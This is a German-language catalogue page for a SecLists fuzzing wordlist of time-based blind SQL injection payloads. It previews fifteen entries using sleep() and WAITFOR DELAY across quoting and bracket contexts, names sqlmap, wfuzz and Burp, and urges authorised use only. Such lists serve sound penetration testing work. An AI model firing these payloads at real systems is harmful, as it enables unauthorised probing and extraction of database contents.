Generic Blind SQL Injection
Zeitbasierte Blind-SQL-Injection-Payloads, die sleep() und WAITFOR DELAY über mehrere Quoting- und Klammer-Kontexte hinweg verwenden. Konzipiert für Inferenzangriffe, bei denen keine Fehlerausgabe zurückgegeben wird.
- Größe
- 1.2 KB
- Kategorie
- Fuzzing
- Quelle
- danielmiessler/SecLists
- Lizenz
- MIT
- Empfohlene Tools
- sqlmapwfuzzburp
Vorschau
Die ersten 15 Einträge. Lade die vollständige Liste (1.2 KB) herunter oder kopiere sie über die Schaltflächen oben.
# from wapiti sleep(__TIME__)# 1 or sleep(__TIME__)# " or sleep(__TIME__)# ' or sleep(__TIME__)# " or sleep(__TIME__)=" ' or sleep(__TIME__)=' 1) or sleep(__TIME__)# ") or sleep(__TIME__)=" ') or sleep(__TIME__)=' 1)) or sleep(__TIME__)# ")) or sleep(__TIME__)=" ')) or sleep(__TIME__)=' ;waitfor delay '0:0:__TIME__'-- );waitfor delay '0:0:__TIME__'--
Zeitbasierte Blind-SQL-Injection-Payloads, die sleep() und WAITFOR DELAY über mehrere Quoting- und Klammer-Kontexte hinweg verwenden. Konzipiert für Inferenzangriffe, bei denen keine Fehlerausgabe zurückgegeben wird.
Diese Liste ist auf Eingabe-Fuzzing und Schwachstellenfindung ausgerichtet. Sie umfasst rund 1.2 KB und harmoniert gut mit Tools wie sqlmap, wfuzz, burp. Wähle die kleinste Liste, die zu deinem Auftrag passt: Kürzere Listen sind schneller und unauffälliger bei Online- Angriffen, während größere Listen eine breitere Abdeckung für Offline-Arbeit bieten, bei der Geschwindigkeit weniger eine Einschränkung darstellt.
Du kannst die Beispielvorschau direkt von dieser Seite kopieren, die gesamte Liste in
deine Zwischenablage kopieren oder die rohe .txt-Datei herunterladen. Die vollständige Liste wird direkt
von ihrer Ursprungsquelle auf GitHub bereitgestellt.
Bezogen von danielmiessler/SecLists und unter MIT verteilt. Verwende Wordlists nur gegen Systeme, für deren Test du ausdrücklich autorisiert bist.